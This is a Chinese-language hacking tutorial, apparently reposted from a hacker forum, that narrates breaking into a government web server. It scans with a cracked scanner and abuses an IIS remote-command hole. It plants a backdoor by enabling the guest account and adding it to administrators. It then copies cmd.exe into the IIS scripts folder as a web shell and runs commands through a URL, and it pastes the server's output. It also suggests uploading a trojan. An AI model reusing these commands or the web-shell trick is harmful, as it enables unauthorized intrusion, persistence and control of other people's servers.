照常启动流光4.5破解版,按ctrl+r,选择winnt/98,然后随便填上一个IP段,本人填的就是某一人民政府的IP,确定后扫描过一会,出现了战果了:
其中人民政府网站的漏洞是可以执行iis远程命令和可以下载sam。
都很常见的漏洞,如果仔细点扫描一定还有其它的漏洞。
这里就用执行iis远程命令吧。sam的还要破解,太麻烦。
先连上去,输入ver
显示winnt 4.0的
先留个后门:
net user guest /activer:y
net user guest xhacker /add
net localgroup administrators guest /add
留好了,这样可以方便地拷贝程序上去了。停!
对于很多人来说,怎么通过net启动程序是个大问题!所以本人就为了菜菜们独创一招:转向unicode攻击法!
unicode是最受欢迎的漏洞,教程也最多,在这就不写多少了。可是人民政府网站根本没有这个漏洞啊,没关系,告诉你无敌的一招!
再输入关键一句(cmd.exe的位置自己dir了):
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\xhacker.exe (大家不要学我把cmd.exe改的这么嚣张)
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\xhacker.exe
1 file(s) copied.
好了,结束输入
exit现在可以转到IE上输入这么一句,太熟悉了,现在变成unicode攻击法了!
http://202.x.118.166/scripts/xhacker.exe?/c+set
CGI 错误
指定的 CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正常。它返回的标题是:
COMPUTERNAME=SERVER
ComSpec=C:\WINNT\system32\cmd.exe (呵呵,cmd.exe的路径)
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=202.102.118.166
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INCLUDE=C:\Program Files\Mts\Include
INSTANCE_ID=1
LIB=C:\Program Files\Mts\Lib
LOCAL_ADDR=202.x.118.166 (我的IP,不好啊)
NUMBER_OF_PROCESSORS=2
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT (看到了吗?)
Path=C:\WINNT\system32;C:\WINNT;C:\Program Files\Mts
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=C:\InetPub\wwwroot (主页目录,重要哦!)
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 5 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0503
PROMPT=$P$G
QUERY_STRING=/c+set (刚才使用的命令!别忘本哦)
REMOTE_ADDR=61.
哈哈,现在就用你熟悉的方法搞定它吧。
当然还可以用net命令copy上一个木马程序,然后用unicode启动!
此文只是提出了其它的思路。比如ida/idq攻击也可以转为unicode攻击。
其实还有些比较好的技巧在里面,自己去思考吧。88
如要转载请注明出处http://xhacker.xilubbs.com>http://xhacker.xilubbs.com
文章转载地址:http://www.cnpaf.net/Class/hack/05121820345081450274.htm